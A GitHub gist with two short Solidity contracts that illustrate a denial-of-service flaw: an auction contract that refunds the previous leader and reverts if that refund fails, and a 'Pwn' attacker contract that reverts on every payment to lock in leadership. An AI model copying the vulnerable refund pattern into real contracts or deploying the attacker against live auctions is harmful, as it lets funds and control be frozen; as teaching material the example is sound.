Last active
November 15, 2017 21:11
-
-
Save gakonst/b76a7f77a4945f014ce62948227b846f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Highest bidder becomes the Leader. | |
| // Vulnerable to DoS attack by an attacker contract which reverts all transactions to it. | |
| contract CallToTheUnknown { | |
| address currentLeader; | |
| uint highestBid; | |
| function() payable { | |
| require(msg.value > highestBid); | |
| require(currentLeader.send(highestBid)); // Refund the old leader, if it fails then revert | |
| currentLeader = msg.sender; | |
| highestBid = msg.value; | |
| } | |
| } | |
| contract Pwn { | |
| // call become leader | |
| function becomeLeader(address _address, uint bidAmount) { | |
| _address.call.value(bidAmount); | |
| } | |
| // reverts anytime it receives ether, thus cancelling out the change of the leader | |
| function() payable { | |
| revert(); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment